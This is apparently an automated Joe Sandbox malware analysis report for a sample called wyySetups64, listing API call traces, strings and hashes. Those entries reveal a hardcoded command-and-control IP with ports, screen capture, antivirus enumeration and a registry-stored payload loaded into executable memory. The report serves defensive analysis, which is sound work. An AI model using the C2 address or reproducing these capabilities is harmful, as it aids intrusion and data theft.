                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0337E35D
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?), ref: 0337E3A4
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0337E3D0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?), ref: 0337E3D7
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?), ref: 0337E3E2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0337E400
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0337E425
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?), ref: 0337E42C
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 0337E446
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0337E464
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                                                                                                                                                              • String ID: %4d.%2d.%2d-%2d:%2d:%2d$118.107.44.219$118.107.44.219$118.107.44.219$118.107.44.219$19091$19092$19092$19093$Console$IpDatespecial

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0337BC8F
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 0337BC9C
                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0337BCA2
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 0337BCAD
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0337BCBA
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000076), ref: 0337BCC2
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0337BCD3
                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004E), ref: 0337BCF8
                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004F), ref: 0337BD26
                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004C), ref: 0337BD78
                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004D), ref: 0337BD8D
                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0337BDA6
                                                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0337BDB4
                                                                                                                                                                                                              • SetStretchBltMode.GDI32(?,00000003), ref: 0337BDC0
                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004F), ref: 0337BDCD
                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004E), ref: 0337BDE0
                                                                                                                                                                                                              • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 0337BE07
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337BE7A
                                                                                                                                                                                                              • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 0337BE97
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337BEAF
                                                                                                                                                                                                                • Part of subcall function 0337F707: _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0337BF23
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0337BF2D
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 0337BF39
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0337BFDF
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0337BFE9
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 0337BFF5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                                                                                                                                                              • String ID: ($6$gfff$gfff

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(75BF73E0), ref: 03376A94
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 03376AA7
                                                                                                                                                                                                                • Part of subcall function 03376910: GetCurrentProcessId.KERNEL32(7AA29978,00000000,00000000,75BF73E0,?,00000000,033910DB,000000FF,?,03376AB3,00000000), ref: 03376938
                                                                                                                                                                                                                • Part of subcall function 03376910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,033910DB,000000FF,?,03376AB3,00000000), ref: 03376947
                                                                                                                                                                                                                • Part of subcall function 03376910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,033910DB,000000FF,?,03376AB3,00000000), ref: 03376960
                                                                                                                                                                                                                • Part of subcall function 03376910: CloseHandle.KERNEL32(00000000,?,00000000,033910DB,000000FF,?,03376AB3,00000000), ref: 0337696B
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03376AC2
                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 03376ADB
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,?), ref: 03376B12
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 03376B19
                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03376B3F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 03376B49
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 03376B5D
                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 03376B85
                                                                                                                                                                                                              • GetSidSubAuthorityCount.ADVAPI32 ref: 03376B98
                                                                                                                                                                                                              • GetSidSubAuthority.ADVAPI32(00000000), ref: 03376BA6
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 03376BB5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 03376BC2
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 03376C1B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                                                                                                                                                              • String ID: -N/$NO/$None/%s
                                                                                                                                                                                                              • API String ID: 3036438616-3095023699

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 755 3376150-33761a5 call 3386770 call 338004b 760 33761a7-33761ae 755->760 761 3376201-3376228 CoCreateInstance 755->761 764 33761b0-33761b2 call 3376050 760->764 762 3376422-337642f lstrlenW 761->762 763 337622e-3376282 761->763 766 3376441-3376450 762->766 767 3376431-337643b lstrcatW 762->767 773 337640a-3376418 763->773 774 3376288-33762a2 763->774 771 33761b7-33761b9 764->771 768 3376452-3376457 766->768 769 337645a-337647a call 337f00a 766->769 767->766 768->769 775 33761db-33761ff call 338004b 771->775 776 33761bb-33761d9 lstrcatW * 2 771->776 773->762 779 337641a-337641f 773->779 774->773 782 33762a8-33762b4 774->782 775->761 775->764 776->775 779->762 783 33762c0-3376363 call 3386770 wsprintfW RegOpenKeyExW 782->783 786 33763e9-33763ff 783->786 787 3376369-33763ba call 3386770 RegQueryValueExW 783->787 790 3376402-3376404 786->790 791 33763dc-33763e3 RegCloseKey 787->791 792 33763bc-33763da lstrcatW * 2 787->792 790->773 790->783 791->786 792->791
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337618B
                                                                                                                                                                                                              • lstrcatW.KERNEL32(033A1F10,0339510C,?,7AA29978,00000AD4,00000000,75BF73E0), ref: 033761CD
                                                                                                                                                                                                              • lstrcatW.KERNEL32(033A1F10,0339535C,?,7AA29978,00000AD4,00000000,75BF73E0), ref: 033761D9
                                                                                                                                                                                                              • CoCreateInstance.OLE32(03392480,00000000,00000017,0339578C,?,?,7AA29978,00000AD4,00000000,75BF73E0), ref: 03376220
                                                                                                                                                                                                              • _memset.LIBCMT ref: 033762CE
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 03376336
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0337635F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03376376
                                                                                                                                                                                                                • Part of subcall function 03376050: _memset.LIBCMT ref: 0337607C
                                                                                                                                                                                                                • Part of subcall function 03376050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03376088
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                                                                                                                                                              • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                                                                                                                              • API String ID: 1221949200-1583895642
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03378132
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,A:\), ref: 03378166
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,B:\), ref: 03378176
                                                                                                                                                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 033781A6
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 033781B7
                                                                                                                                                                                                              • __wcsnicmp.LIBCMT ref: 033781CE
                                                                                                                                                                                                              • lstrcpyW.KERNEL32(00000AD4,?), ref: 03378204
                                                                                                                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 03378228
                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,00000000), ref: 03378233
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                                                                                                                                                              • String ID: A:\$B:\
                                                                                                                                                                                                              • API String ID: 950920757-1009255891
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 03375320: InterlockedDecrement.KERNEL32(00000008), ref: 0337536F
                                                                                                                                                                                                                • Part of subcall function 03375320: SysFreeString.OLEAUT32(00000000), ref: 03375384
                                                                                                                                                                                                                • Part of subcall function 03375320: SysAllocString.OLEAUT32(03395148), ref: 033753D5
                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,03395148,033769A4,03395148,00000000,75BF73E0), ref: 033767F4
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 033767FE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 03376816
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0337681D
                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0337683F
                                                                                                                                                                                                              • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 03376871
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0337687B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 033768E6
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 033768ED
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                                                                                                                                                              • String ID: NONE_MAPPED
                                                                                                                                                                                                              • API String ID: 1317816589-2950899194
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?,74DEDF80,00000000,75BF73E0), ref: 03376C8B
                                                                                                                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 03376CAA
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03376CE1
                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 03376CF4
                                                                                                                                                                                                              • swprintf.LIBCMT ref: 03376D39
                                                                                                                                                                                                              • swprintf.LIBCMT ref: 03376D4C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                                                                                                                                                              • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                                                                                                                                                              • API String ID: 3202570353-3501811827
                                                                                                                                                                                                              • Opcode ID: c48b5201d3f1596db91b92c1f57558e1ea8971c9432f9cd54706e3c5d4fa06ae
                                                                                                                                                                                                              • Instruction ID: 0b0e25c7aea189dc99b0f0cb39a907232d1c984abd65a427cfb86ab36df92e46
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c48b5201d3f1596db91b92c1f57558e1ea8971c9432f9cd54706e3c5d4fa06ae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB316FB6E0020CABDB14DFE5CC85FEEB7B9FB48700F50421EE91AAB241E6745945CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDXGIFactory.DXGI(0339579C,?,7AA29978,74DEDF80,00000000,75BF73E0), ref: 03376F4A
                                                                                                                                                                                                              • swprintf.LIBCMT ref: 0337711E
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 033771C7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                                                                                                                                                              • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                                                                                                                                                              • API String ID: 3803070356-257307503
                                                                                                                                                                                                              • Opcode ID: 8b5155474e2d83885070a010ebeaa2809e18b3cf8d45c2b808eeea1ed4c6b10d
                                                                                                                                                                                                              • Instruction ID: 1bfcd48134716939767426eb19d6697989451bbe970b10ec9de09aade7e6ed92
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b5155474e2d83885070a010ebeaa2809e18b3cf8d45c2b808eeea1ed4c6b10d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1E15271E012259FDF34CE64CCD1BEEB3B5AB89700F1446E9D91AA7284D774AE818F90

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 00BD5507
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 00BD552E
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00BD5548
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 00BD5563
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 00BD5586
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00BD55B1
                                                                                                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BD5605
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00BD5669
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00BD568D
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00BD569F
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 00BD5726
                                                                                                                                                                                                              • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 00BD5799
                                                                                                                                                                                                              • RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 00BD57AC
                                                                                                                                                                                                              • RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 00BD57C4
                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 00BD57CE
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 00BD57FE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                                                                                                                                                                                              • String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
                                                                                                                                                                                                              • API String ID: 354323817-737951744
                                                                                                                                                                                                              • Opcode ID: cc639b8b0d133302520048f41b754afbb3adfb0eab03a821a5567828521cec4a
                                                                                                                                                                                                              • Instruction ID: 32295588429ae71fde3bc20fcf24458fd67139f7f60ef7e2f4254d52b6c94f47
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc639b8b0d133302520048f41b754afbb3adfb0eab03a821a5567828521cec4a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4591D275A40744ABD720DF60DC85FABBBF9EB84700F50459AFA099B341EBB19E40CB61

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03379E7B
                                                                                                                                                                                                              • GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03379EFC
                                                                                                                                                                                                              • GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03379F24
                                                                                                                                                                                                              • GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03379F7F
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 03379FC0
                                                                                                                                                                                                                • Part of subcall function 0337F673: __FF_MSGBANNER.LIBCMT ref: 0337F68C
                                                                                                                                                                                                                • Part of subcall function 0337F673: __NMSG_WRITE.LIBCMT ref: 0337F693
                                                                                                                                                                                                                • Part of subcall function 0337F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76), ref: 0337F6B8
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337A000
                                                                                                                                                                                                              • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 0337A028
                                                                                                                                                                                                              • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 0337A0B7
                                                                                                                                                                                                              • GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 0337A112
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337A134
                                                                                                                                                                                                              • _memcpy_s.LIBCMT ref: 0337A183
                                                                                                                                                                                                              • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 0337A1D0
                                                                                                                                                                                                              • GdipCreateBitmapFromScan0.GDIPLUS(?,?,03395A78,00022009,?,00000000,?,00000000), ref: 0337A22C
                                                                                                                                                                                                              • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 0337A24C
                                                                                                                                                                                                              • GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 0337A267
                                                                                                                                                                                                              • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 0337A274
                                                                                                                                                                                                              • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 0337A27B
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337A296
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                                                                                                                                                                                              • String ID: &
                                                                                                                                                                                                              • API String ID: 640422297-3042966939
                                                                                                                                                                                                              • Opcode ID: e51b7b8979e9a5b836ed7937017df88989408d1c14832a13742ebb4c62638970
                                                                                                                                                                                                              • Instruction ID: 2016e1d32bec30615098088940da99ec0c12cd725e0fd7ff6413465a6e79aa21
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e51b7b8979e9a5b836ed7937017df88989408d1c14832a13742ebb4c62638970
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6D131B1A006199BDB34DF55CCC0B9AB7B8FF48304F0486A9E609A7301D778AA85CF65

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 00BD2D9B
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00BD2DA7
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 00BD2DAD
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00BD2DDA
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00BD2E06
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 00BD2E12
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 00BD2E31
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 00BD2E3D
                                                                                                                                                                                                              • gethostbyname.WS2_32(00000000), ref: 00BD2E4B
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 00BD2E6D
                                                                                                                                                                                                              • connect.WS2_32(?,?,00000010), ref: 00BD2E8B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                                                                                                                              • String ID: 0u
                                                                                                                                                                                                              • API String ID: 640718063-3203441087
                                                                                                                                                                                                              • Opcode ID: c132cf21c56fc4ccd93a38b2377639fe123b2a695574fd7ceadfdc7dc5683821
                                                                                                                                                                                                              • Instruction ID: 8a71a5ec6a93ab2a584129ae0a323335c163ad063cebe778673fe1d755b3c2d1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c132cf21c56fc4ccd93a38b2377639fe123b2a695574fd7ceadfdc7dc5683821
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 966152B1A40744AFE720DFA4DC85FAAB7F8FF48714F10451AF645AB2D0DBB0A9048B65

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 03372DBB
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 03372DC7
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 03372DCD
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 03372DFA
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03372E26
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03372E32
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 03372E51
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03372E5D
                                                                                                                                                                                                              • gethostbyname.WS2_32(00000000), ref: 03372E6B
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 03372E8D
